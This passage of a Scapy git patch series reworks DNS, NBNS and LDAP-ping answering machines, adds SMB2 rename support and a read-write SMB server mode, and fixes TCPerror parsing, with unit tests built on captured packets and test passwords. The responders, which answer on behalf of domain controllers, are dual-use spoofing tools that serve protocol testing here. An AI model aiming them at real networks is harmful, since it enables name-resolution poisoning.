DcSockAddr=DcSockAddr( + sin_addr=address, + ), + NtVersion="V1+V5EX+V5EX_WITH_IP", + LmNtToken=65535, + Lm20Token=65535, + # Below can be customized + Flags=0x3F3FD, + DomainGuid=self.DomainGuid, + DnsForestName=self.DnsForestName, + DnsDomainName=self.DnsForestName, + DnsHostName=self.DnsHostName, + NetbiosComputerName=self.NetbiosComputerName, + DcSiteName=self.DcSiteName, + ClientSiteName=self.DcSiteName, + ) + return resp + _located_dc = collections.namedtuple("LocatedDC", ["ip", "samlogon"]) _dclocatorcache = conf.netcache.new_cache("dclocator", 600) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index fa02dec8f40..718b23113f9 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -34,9 +34,8 @@ XShortField, XStrFixedLenField ) -from scapy.volatile import RandUUID from scapy.layers.inet import IP, UDP, TCP -from scapy.layers.l2 import SourceMACField +from scapy.layers.l2 import Ether, SourceMACField class NetBIOS_DS(Packet): @@ -382,7 +381,7 @@ def tcp_reassemble(cls, data, *args, **kwargs): class NBNS_am(AnsweringMachine): function_name = "nbnsd" - filter = "udp port 137 or 138" + filter = "udp port 137" sniff_options = {"store": 0} def parse_options(self, server_name=None, from_ip=None, ip=None): @@ -403,16 +402,6 @@ def parse_options(self, server_name=None, from_ip=None, ip=None): def is_request(self, req): if self.from_ip and IP in req and req[IP].src not in self.from_ip: return False - if NBTDatagram in req: - # special case: mailslot ping - from scapy.layers.smb import SMBMailslot_Write, NETLOGON_SAM_LOGON_REQUEST - try: - return ( - SMBMailslot_Write in req and - NETLOGON_SAM_LOGON_REQUEST in req.Data - ) - except AttributeError: - return False return NBNSQueryRequest in req and ( not self.ServerName or req[NBNSQueryRequest].QUESTION_NAME.strip() == self.ServerName @@ -420,10 +409,13 @@ def is_request(self, req): def make_reply(self, req): # type: (Packet) -> Packet - if NBTDatagram in req: - # Special case - return self.make_mailslot_ping_reply(req) - resp = IP(dst=req[IP].src) / UDP(sport=req.dport, dport=req.sport) + resp = Ether( + dst=req[Ether].src, + src=None if req[Ether].dst == "ff:ff:ff:ff:ff:ff" else req[Ether].dst, + ) / IP(dst=req[IP].src) / UDP( + sport=req.dport, + dport=req.sport, + ) address = self.ip or get_if_addr(self.optsniff.get("iface", conf.iface)) resp /= NBNSHeader() / NBNSQueryResponse( RR_NAME=self.ServerName or req.QUESTION_NAME, @@ -432,29 +424,3 @@ def make_reply(self, req): ) resp.NAME_TRN_ID = req.NAME_TRN_ID return resp - - def make_mailslot_ping_reply(self, req): - # type: (Packet) -> Packet - from scapy.layers.smb import ( - SMBMailslot_Write, - SMB_Header, - NETLOGON_SAM_LOGON_RESPONSE_EX, - ) - resp = IP(dst=req[IP].src) / UDP(sport=req.dport, dport=req.sport) - address = self.ip or get_if_addr(self.optsniff.get("iface", conf.iface)) - resp /= NBTDatagram( - SourceName=req.DestinationName, - SUFFIX1=req.SUFFIX2, - DestinationName=req.SourceName, - SUFFIX2=req.SUFFIX1, - SourceIP=address, - ) / SMB_Header() / SMBMailslot_Write( - Name=req.Data.MailslotName, - ) - resp.Data = NETLOGON_SAM_LOGON_RESPONSE_EX( - OpCode=0x17, - Flags="LDAP+DC", - DomainGuid=RandUUID(), - sin_addr=address, - ) - return resp diff --git a/test/answering_machines.uts b/test/answering_machines.uts index e28de57daf2..d737e58945c 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -16,8 +16,13 @@ def test_am(cls_name, packet_query, check_reply, mock_sniff, **kargs): kargs["prn"](packet_query) mock_sniff.side_effect = sniff am = cls_name(**kargs) - am.send_reply = lambda x: check_reply(x.__class__(bytes(x))) + called = [False] + def _sndrpl(x): + called[0] = True + check_reply(x.__class__(bytes(x))) + am.send_reply = _sndrpl am() + assert called[0], "Filter never passed for AnsweringMachine !" = BOOT_am @@ -55,32 +60,61 @@ test_am(ARP_am, = ICMPEcho_am def check_ICMP_am_reply(packet): packet.show() + assert packet[Ether].src != "ff:ff:ff:ff:ff:ff" + assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" assert IP in packet and ICMP in packet assert packet[IP].dst == "1.1.1.1" + assert packet[IP].src == "2.2.2.2" assert packet[ICMP].seq == 12 test_am(ICMPEcho_am, - Ether()/IP(src="1.1.1.1", dst="2.2.2.2")/ICMP(seq=12), + Ether(src="aa:aa:aa:aa:aa:aa", dst="ff:ff:ff:ff:ff:ff")/IP(src="1.1.1.1", dst="2.2.2.2")/ICMP(seq=12), check_ICMP_am_reply) = DNS_am def check_DNS_am_reply(packet): + assert packet[Ether].src == "bb:bb:bb:bb:bb:bb" + assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" + assert packet[IP].src == "127.0.0.2" + assert packet[IP].dst == "127.0.0.1" assert DNS in packet and packet[DNS].ancount == 1 assert packet[DNS].an[0].rdata == "192.168.1.1" assert packet[DNS].qd[0].qname == b"www.secdev.org." test_am(DNS_am, - IP()/UDP()/DNS(qd=DNSQR(qname="www.secdev.org")), + Ether(src="aa:aa:aa:aa:aa:aa", dst="bb:bb:bb:bb:bb:bb")/IP(src="127.0.0.1", dst="127.0.0.2")/UDP()/DNS(qd=DNSQR(qname="www.secdev.org")), check_DNS_am_reply, joker="192.168.1.1") +def check_DNS_am_reply_srvmatch(packet): + assert DNS in packet and packet[DNS].ancount == 1 + assert isinstance(packet[DNS].an[0], DNSRRSRV) + assert packet[DNS].an[0].rrname == b'_ldap._tcp.dc._msdcs.scapy.fr.' + assert packet[DNS].an[0].port == 389 + assert packet[DNS].an[0].target == b'dc.scapy.fr.' + +test_am(DNS_am, + Ether()/IP()/UDP()/DNS(qd=DNSQR(qname=b'_ldap._tcp.dc._msdcs.scapy.fr.', qtype="SRV")), + check_DNS_am_reply_srvmatch, + srvmatch={"_ldap._tcp.dc._msdcs.scapy.fr": (389, "dc.scapy.fr")}) + +def check_DNS_am_reply_arpa(packet): + assert DNS in packet and packet[DNS].ancount == 1 + assert packet[DNS].an[0].rdata == b"scapy." + assert packet[DNS].an[0].rrname == b"1.0.16.172.in-addr.arpa." + +test_am(DNS_am, + Ether()/IP()/UDP()/DNS(qd=DNSQR(qname=b"1.0.16.172.in-addr.arpa.", qtype="PTR")), + check_DNS_am_reply_arpa, + jokerarpa="scapy") + def check_DNS_am_reply2(packet): assert DNS in packet and packet[DNS].ancount == 2 assert packet[DNS].an[0].rdata == "128.0.0.1" assert packet[DNS].an[1].rdata == "::1" test_am(DNS_am, - IP(b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x004\xe8\x9a\x00\x00\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x06gaagle\x03com\x00\x00\x01\x00\x01\x06google\x03com\x00\x00\x1c\x00\x01'), + Ether()/IP(b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x004\xe8\x9a\x00\x00\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x06gaagle\x03com\x00\x00\x01\x00\x01\x06google\x03com\x00\x00\x1c\x00\x01'), check_DNS_am_reply2, match={"google.com": ("127.0.0.1", "::1"), "gaagle.com": "128.0.0.1"}, joker=False) @@ -152,16 +186,71 @@ test_WiFi_am(Dot11(FCfield="to-DS")/IP()/TCP()/"Scapy", = NBNS_am def check_NBNS_am_reply(name): def check(packet): + packet.show() + assert packet[Ether].src != "ff:ff:ff:ff:ff:ff" + assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME.strip() == bytes_encode(name) return check for server_name in (None, "", b"test", "test"): test_am(NBNS_am, - Ether()/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="test"), + Ether(src="aa:aa:aa:aa:aa:aa", dst="ff:ff:ff:ff:ff:ff")/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="test"), check_NBNS_am_reply("test"), server_name=server_name) test_am(NBNS_am, - Ether()/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME=b"\x85"), + Ether(src="aa:aa:aa:aa:aa:aa", dst="ff:ff:ff:ff:ff:ff")/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME=b"\x85"), check_NBNS_am_reply(b"\x85"), server_name=b"\x85") + += LdapPing_am +def check_LdapPing_am_reply(packet): + nlogon = packet[CLDAP].protocolOp.attributes[0] + assert nlogon.type == b"Netlogon" + logonresp = NETLOGON(nlogon.values[0].value.val) + assert isinstance(logonresp, NETLOGON_SAM_LOGON_RESPONSE_EX) + logonresp.show() + assert logonresp.DnsForestName == b'scapy.fr.', "DnsForestName" + assert logonresp.DnsDomainName == b'scapy.fr.', "DnsDomainName" + assert logonresp.DnsHostName == b'DC.scapy.fr.', "DnsHostName" + assert logonresp.NetbiosDomainName == b'SCAPY.', "NetbiosDomainName" + assert logonresp.NetbiosComputerName == b'DC.', "NetbiosComputerName" + assert logonresp.NtVersion == 3, "NtVersion" + assert logonresp.Flags == 0x3f3fd, "Flags" + assert logonresp.ClientSiteName == b'Default-First-Site-Name.', "ClientSiteName" + +test_am(LdapPing_am, + Ether(b'\xaa\xaa\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xbb\xbb\x08\x00E\x00\x00\xaf\x9d\xb1\x00\x00\x80\x11\x9c\x89\xac\x13P\x01\xac\x13W\xdb\xc7{\x01\x85\x00\x9bV[0q\x02\x01\x01cl\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0M\xa3\x15\x04\tDnsDomain\x04\x08scapy.fr\xa3\x0e\x04\x04Host\x04\x06HOST01\xa3\r\x04\x05NtVer\x04\x04\x16\x00\x00 \xa3\x15\x04\x0bDnsHostName\x04\x06HOST010\n\x04\x08Netlogon'), + check_LdapPing_am_reply, + NetbiosComputerName="DC", + NetbiosDomainName="SCAPY", + DnsForestName="scapy.fr") + + +def check_NBNS_LdapPing_am_reply(packet): + packet.show() + assert SMBMailslot_Write in packet, "SMBMailslot_Write" + assert packet[SMBMailslot_Write].Name == b'\\MAILSLOT\\NET\\GETDC510CC0AD', "SMBMailslot_Write.Name" + logonresp = NETLOGON(packet[SMBMailslot_Write].Data.load) + logonresp.show() + assert logonresp.DcSockAddrSize == 16, "DcSockAddrSize" + assert isinstance(logonresp.DcSockAddr, DcSockAddr) + assert logonresp.DcSockAddr.sin_family == 2, "sin_family" + assert logonresp.DcSockAddr.sin_port == 0, "sin_port" + assert logonresp.DcSockAddr.sin_zero == 0, "sin_zero" + assert logonresp.DcSockAddr.sin_addr == get_if_addr(conf.iface) + assert logonresp.DnsForestName == b'scapy.fr.', "DnsForestName" + assert logonresp.DnsDomainName == b'scapy.fr.', "DnsDomainName" + assert logonresp.DnsHostName == b'DC.scapy.fr.', "DnsHostName" + assert logonresp.NetbiosDomainName == b'SCAPY.', "NetbiosDomainName" + assert logonresp.NetbiosComputerName == b'DC.', "NetbiosComputerName" + assert logonresp.NtVersion == 13, "NtVersion" + assert logonresp.Flags == 0x3f3fd, "Flags" + assert logonresp.ClientSiteName == b'Default-First-Site-Name.', "ClientSiteName" + +test_am(LdapPing_am, + Ether(b'\xaa\xaa\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xbb\xbb\x08\x00E\x00\x01\n\xff\x82\x00\x00\x80\x11:]\xac\x13P\x01\xac\x13W\xdb\x00\x8a\x00\x8a\x00\xf6\xd5\xcb\x10\x02\xde\x9d\xac\x13P\x01\x00\x8a\x00\xe0\x00\x00 EIEPFDFEDADBCACACACACACACACACAAA\x00 FDEDEBFAFJCACACACACACACACACACABM\x00\xffSMB%\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x11\x00\x00@\x00\x02\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00@\x00\\\x00\x03\x00\x01\x00\x00\x00\x02\x00W\x00\\MAILSLOT\\NET\\NETLOGON\x00\x12\x00\x00\x00H\x00O\x00S\x00T\x000\x001\x00\x00\x00\x00\x00\\MAILSLOT\\NET\\GETDC510CC0AD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00 \xff\xff\xff\xff'), + check_NBNS_LdapPing_am_reply, + NetbiosComputerName="DC", + NetbiosDomainName="SCAPY", + DnsForestName="scapy.fr") From 942cdde351c13d324a45415a67e68dfead779e02 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 26 Apr 2024 01:38:38 +0200 Subject: [PATCH 1262/1632] SMB2: support write & file/folder creation --- doc/scapy/layers/smb.rst | 22 +++ scapy/error.py | 2 +- scapy/layers/ntlm.py | 18 ++- scapy/layers/smb2.py | 189 +++++++++++++++++++++++--- scapy/layers/smbserver.py | 115 +++++++++++++--- test/scapy/layers/smb2.uts | 10 ++ test/scapy/layers/smbclientserver.uts | 30 +++- 7 files changed, 339 insertions(+), 47 deletions(-) diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 202ced7b663..787d363e941 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -284,6 +284,28 @@ A share is identified by a ``name`` and a ``path`` (+ an optional description ca ), ) + +.. note:: + By default, Scapy's SMB server is read-only. You can set ``readonly`` to ``False`` to disable it, as follows. + + +**Start a SMB server with NTLM in Read-Write mode** + +.. code:: python + + smbserver( + shares=[SMBShare(name="Scapy", path="/tmp")], + iface="eth0", + ssp=NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1"), + "Administrator": MD4le("Password2"), + }, + ), + # Enable Read-Write + readonly=False, + ) + .. note:: It is possible to start the :class:`~scapy.layers.smbserver.smbserver` (albeit only in unauthenticated mode) directly from the OS, using the following:: diff --git a/scapy/error.py b/scapy/error.py index 44a3561228e..ff3fdc13eb4 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -68,7 +68,7 @@ def filter(self, record): if nb < 2: nb += 1 if nb == 2: - record.msg = "more " + record.msg + record.msg = "more " + str(record.msg) else: return False self.warning_table[caller] = (tm, nb) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 197b4937bbb..11eb4703804 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -957,8 +957,15 @@ def MD4le(x): def RC4Init(key): """Alleged RC4""" from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms, + ) + except ImportError: + decrepit_algorithms = algorithms - algorithm = algorithms.ARC4(key) + algorithm = decrepit_algorithms.ARC4(key) cipher = Cipher(algorithm, mode=None) encryptor = cipher.encryptor() return encryptor @@ -974,8 +981,15 @@ def RC4K(key, data): RC4 algorithm. """ from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms, + ) + except ImportError: + decrepit_algorithms = algorithms - algorithm = algorithms.ARC4(key) + algorithm = decrepit_algorithms.ARC4(key) cipher = Cipher(algorithm, mode=None) encryptor = cipher.encryptor() return encryptor.update(data) + encryptor.finalize() diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 4f2fbd3860c..e22698af643 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -60,6 +60,7 @@ XLEShortField, XStrLenField, XStrFixedLenField, + YesNoByteField, ) from scapy.sessions import DefaultSession from scapy.supersocket import StreamSocket @@ -108,6 +109,7 @@ 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", 0xC0000043: "STATUS_SHARING_VIOLATION", 0xC000006D: "STATUS_LOGON_FAILURE", + 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", 0xC0000071: "STATUS_PASSWORD_EXPIRED", 0xC0000072: "STATUS_ACCOUNT_DISABLED", 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", @@ -351,6 +353,7 @@ 0x06: "FileInternalInformation", 0x07: "FileEaInformation", 0x08: "FileAccessInformation", + 0x0A: "FileRenameInformation", 0x0E: "FilePositionInformation", 0x10: "FileModeInformation", 0x11: "FileAlignmentInformation", @@ -362,6 +365,7 @@ 0x30: "FileNormalizedNameInformation", 0x3C: "FileIdExtdDirectoryInformation", } +_FileInformationClasses = {} # [MS-FSCC] 2.1.7 FILE_NAME_INFORMATION @@ -682,6 +686,33 @@ def default_payload_class(self, s): return conf.padding_layer +# [MS-FSCC] 2.4.37 FileRenameInformation + + +class FileRenameInformation(Packet): + fields_desc = [ + YesNoByteField("ReplaceIfExists", False), + XStrFixedLenField("Reserved", b"", length=7), + LELongField("RootDirectory", 0), + FieldLenField("FileNameLength", 0, length_of="FileName", fmt=" bytes + if len(pkt) < 24: + # 'Length of this field MUST be the number of bytes required to make the + # size of this structure at least 24.' + pkt += (24 - len(pkt)) * b"\x00" + return pkt + pay + + def default_payload_class(self, s): + return conf.padding_layer + + +_FileInformationClasses[0x0A] = FileRenameInformation + + # [MS-FSCC] 2.4.41 FileStandardInformation @@ -1502,6 +1533,10 @@ def guess_payload_class(self, payload): if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: return SMB2_Query_Info_Response return SMB2_Query_Info_Request + elif self.Command == 0x0011: # Set info + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + return SMB2_Set_Info_Response + return SMB2_Set_Info_Request elif self.Command == 0x000B: # IOCTL if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: return SMB2_IOCTL_Response @@ -3663,6 +3698,25 @@ class SMB2_Query_Quota_Info(Packet): ] +SMB2_INFO_TYPE = { + 0x01: "SMB2_0_INFO_FILE", + 0x02: "SMB2_0_INFO_FILESYSTEM", + 0x03: "SMB2_0_INFO_SECURITY", + 0x04: "SMB2_0_INFO_QUOTA", +} + +SMB2_ADDITIONAL_INFORMATION = { + 0x00000001: "OWNER_SECURITY_INFORMATION", + 0x00000002: "GROUP_SECURITY_INFORMATION", + 0x00000004: "DACL_SECURITY_INFORMATION", + 0x00000008: "SACL_SECURITY_INFORMATION", + 0x00000010: "LABEL_SECURITY_INFORMATION", + 0x00000020: "ATTRIBUTE_SECURITY_INFORMATION", + 0x00000040: "SCOPE_SECURITY_INFORMATION", + 0x00010000: "BACKUP_SECURITY_INFORMATION", +} + + class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY INFO Request" Command = 0x0010 @@ -3673,12 +3727,7 @@ class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): ByteEnumField( "InfoType", 0, - { - 0x01: "SMB2_0_INFO_FILE", - 0x02: "SMB2_0_INFO_FILESYSTEM", - 0x03: "SMB2_0_INFO_SECURITY", - 0x04: "SMB2_0_INFO_QUOTA", - }, + SMB2_INFO_TYPE, ), ByteEnumField("FileInfoClass", 0, FileInformationClasses), LEIntField("OutputBufferLength", 0), @@ -3688,16 +3737,7 @@ class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): "AdditionalInformation", 0, -32, - { - 0x00000001: "OWNER_SECURITY_INFORMATION", - 0x00000002: "GROUP_SECURITY_INFORMATION", - 0x00000004: "DACL_SECURITY_INFORMATION", - 0x00000008: "SACL_SECURITY_INFORMATION", - 0x00000010: "LABEL_SECURITY_INFORMATION", - 0x00000020: "ATTRIBUTE_SECURITY_INFORMATION", - 0x00000040: "SCOPE_SECURITY_INFORMATION", - 0x00010000: "BACKUP_SECURITY_INFORMATION", - }, + SMB2_ADDITIONAL_INFORMATION, ), FlagsField( "Flags", @@ -3714,11 +3754,20 @@ class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): "Buffer", OFFSET, [ - PacketListField( - "Input", - None, - SMB2_Query_Quota_Info, - length_from=lambda pkt: pkt.InputLen, + MultipleTypeField( + [ + ( + # QUOTA + PacketListField( + "Input", + None, + SMB2_Query_Quota_Info, + length_from=lambda pkt: pkt.InputLen, + ), + lambda pkt: pkt.InfoType == 0x04, + ), + ], + StrLenField("Input", b"", length_from=lambda pkt: pkt.InputLen), ), ], ), @@ -3788,6 +3837,104 @@ def post_build(self, pkt, pay): ) +# sect 2.2.39 + + +class SMB2_Set_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): + name = "SMB2 SET INFO Request" + Command = 0x0011 + OFFSET = 32 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x21), + ByteEnumField( + "InfoType", + 0, + SMB2_INFO_TYPE, + ), + ByteEnumField("FileInfoClass", 0, FileInformationClasses), + LEIntField("DataLen", None), + XLEIntField("DataBufferOffset", None), # Short + Reserved = Int + FlagsField( + "AdditionalInformation", + 0, + -32, + SMB2_ADDITIONAL_INFORMATION, + ), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + _NTLMPayloadField( + "Buffer", + OFFSET, + [ + MultipleTypeField( + [ + ( + # FILE + PacketLenField( + "Data", + None, + lambda x, _parent: _FileInformationClasses.get( + _parent.FileInfoClass, conf.raw_layer + )(x), + length_from=lambda pkt: pkt.DataLen, + ), + lambda pkt: pkt.InfoType == 0x01, + ), + ( + # QUOTA + PacketListField( + "Data", + None, + SMB2_Query_Quota_Info, + length_from=lambda pkt: pkt.DataLen, + ), + lambda pkt: pkt.InfoType == 0x04, + ), + ], + StrLenField("Data", b"", length_from=lambda pkt: pkt.DataLen), + ), + ], + ), + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Data": 4, + }, + ) + + pay + ) + + +bind_top_down( + SMB2_Header, + SMB2_Set_Info_Request, + Command=0x00011, +) + + +class SMB2_Set_Info_Response(_SMB2_Payload): + name = "SMB2 SET INFO Request" + Command = 0x0011 + fields_desc = [ + XLEShortField("StructureSize", 0x02), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Set_Info_Response, + Command=0x00011, + Flags=1, +) + + # sect 2.2.42.1 diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index e9fc4b416fe..46f89da2b74 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -112,6 +112,8 @@ SMB2_Session_Logoff_Response, SMB2_Session_Setup_Request, SMB2_Session_Setup_Response, + SMB2_Set_Info_Request, + SMB2_Set_Info_Response, SMB2_Signing_Capabilities, SMB2_Tree_Connect_Request, SMB2_Tree_Connect_Response, @@ -210,7 +212,7 @@ class SMB_Server(Automaton): pkt_cls = DirectTCP socketcls = SMBStreamSocket - def __init__(self, shares=[], ssp=None, verb=True, *args, **kwargs): + def __init__(self, shares=[], ssp=None, verb=True, readonly=True, *args, **kwargs): self.verb = verb if "sock" not in kwargs: raise ValueError( @@ -268,6 +270,7 @@ def __init__(self, shares=[], ssp=None, verb=True, *args, **kwargs): self.DOMAIN_REFERRALS = kwargs.pop("DOMAIN_REFERRALS", []) if self.USE_SMB1: log_runtime.warning("Serving SMB1 is not supported :/") + self.readonly = readonly # We don't want to update the parent shares argument self.shares = shares.copy() # Append the IPC$ share @@ -938,7 +941,7 @@ def make_file_id(self, fname): hash = hashlib.md5((fname or "").encode()).digest() return 0x4000000000 | struct.unpack("= 2: log_runtime.info("-- Scapy %s SMB Server --" % conf.version) log_runtime.info( - "SSP: %s. Serving %s shares:" + "SSP: %s. Read-Only: %s. Serving %s shares:" % ( conf.color_theme.yellow(ssp or "NTLM (guest)"), + ( + conf.color_theme.yellow("YES") + if readonly + else conf.color_theme.format("NO", "bg_red+white") + ), conf.color_theme.red(len(shares)), ) ) @@ -1630,6 +1700,7 @@ def __init__( # SMB server ssp=ssp, shares=shares, + readonly=readonly, # SMB arguments **kwargs, ) diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index c9c71545b42..80fe34e237a 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -540,3 +540,13 @@ assert sd.Dacl.toSDDL() == [ '(A;OI+CI;;;;S-1-5-32-544)', '(A;OI+CI;;;;S-1-5-32-545)', ] + += SMB2 Set Info Request with Rename + +set_info = NBTSession(b'\x00\x00\x00|\xfeSMB@\x00\x01\x00#\x00\x00\x00\x11\x00\x01\x000\x00\x00\x00\x00\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\x00\x01\n\x1c\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\xb0\n\x9c\xfd@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x01\xc1\\\\1\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00t\x00e\x00s\x00t\x00') + +assert set_info.FileId.Persistent == 0x40fd9c0ab0 +assert isinstance(set_info.Data, FileRenameInformation) +assert set_info.Data.FileName == "test" +assert not set_info.Data.ReplaceIfExists + diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts index ebb91e081da..d80fd449426 100644 --- a/test/scapy/layers/smbclientserver.uts +++ b/test/scapy/layers/smbclientserver.uts @@ -239,9 +239,10 @@ with (ROOTPATH / "fileScapy").open("w") as fd: fd.write("Nice\nData") class run_smbserver: - def __init__(self, guest=False): + def __init__(self, guest=False, readonly=True): self.srv = None self.guest = guest + self.readonly = readonly def __enter__(self): if self.guest: @@ -257,6 +258,7 @@ class run_smbserver: debug=4, port=12345, bg=True, + readonly=self.readonly, # NTLMSSP IDENTITIES=IDENTITIES, ) @@ -314,6 +316,8 @@ class run_smbclient: print("smbclient output:") print(self.output) +cli = None + = smbserver: SMB 3.1.1 - connect then list shares with run_smbserver(guest=True): @@ -379,3 +383,27 @@ with run_smbserver(): raise finally: cli.close() + += smbserver: SMB 3.1.1 - connect then put file + +LOCALPATH = pathlib.Path(get_temp_dir()) + +nicedata = ("A" * 100 + "\n") * 5 +with open(LOCALPATH / "newCustomFile", "w") as fd: + fd.write(nicedata) + +with run_smbserver(readonly=False): + try: + cli = run_smbclient(user="Administrator", password="Password2", share="test", cwd=LOCALPATH) + cli.cmd("put newCustomFile") + output = cli.getoutput() + print(output) + assert "putting file newCustomFile" in output[0], "strange output" + assert (ROOTPATH / "newCustomFile").exists(), "file doesn't exist" + with (ROOTPATH / "newCustomFile").open("r") as fd: + assert fd.read() == nicedata, "invalid data" + except Exception: + cli.printdebug() + raise + finally: + cli.close() From 725aab36bdfc6dc46904cc870839c6343ebf2297 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 29 Apr 2024 01:05:47 +0200 Subject: [PATCH 1263/1632] Fix TCPerror parsing --- scapy/layers/inet.py | 7 +++++++ scapy/tools/UTscapy.py | 4 ++-- test/scapy/layers/inet.uts | 4 ++++ 3 files changed, 13 insertions(+), 2 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 9003ccf82db..ed8ce7e2ae9 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -47,6 +47,7 @@ IPField, IP6Field, IntField, + MayEnd, MultiEnumField, MultipleTypeField, PacketField, @@ -1269,6 +1270,12 @@ def mysummary(self): class TCPerror(TCP): name = "TCP in ICMP" + fields_desc = ( + TCP.fields_desc[:2] + + # MayEnd after the 8 first octets. + [MayEnd(TCP.fields_desc[2])] + + TCP.fields_desc[3:] + ) def answers(self, other): if not isinstance(other, TCP): diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index e5d338894a0..ad008861ed3 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -28,7 +28,7 @@ from scapy.consts import WINDOWS from scapy.config import conf -from scapy.compat import base64_bytes, bytes_hex, plain_str +from scapy.compat import base64_bytes from scapy.themes import DefaultTheme, BlackAndWhite from scapy.utils import tex_escape @@ -548,7 +548,7 @@ def run_test(test, get_interactive_session, theme, verb=3, # Add optional debugging data to log if debug.crashed_on: cls, val = debug.crashed_on - test.output += "\n\nPACKET DISSECTION FAILED ON:\n %s(hex_bytes('%s'))" % (cls.__name__, plain_str(bytes_hex(val))) + test.output += "\n\nPACKET DISSECTION FAILED ON:\n %s(bytes.fromhex('%s'))" % (cls.__name__, val.hex()) debug.crashed_on = None test.prepare(theme) if verb > 2: diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 55370f1c708..acc3da96df0 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -680,6 +680,10 @@ query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/ICMP()/"scapy" answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/ICMPerror()/"scapy" assert answer.answers(query) == True += IPv4 - TCPError parsing +pkt = Ether(bytes.fromhex('005056a4302ffcbd676360c908004500003800000000f80164b6682ce6b70ad504560b004f410000000045000028400e00000106fdae0ad50456681204d7f73100507d4430f8')) +assert TCPerror in pkt and pkt[TCPerror].sport == 63281 and pkt[TCPerror].dport == 80 + = IPv4 - mDNS a = IP(dst="224.0.0.251") assert a.hashret() == b"\x00" From aeb07a7e4424821209fea96de4f997d3d316f41d Mon Sep 17 00:00:00 2001 From: gpotter2 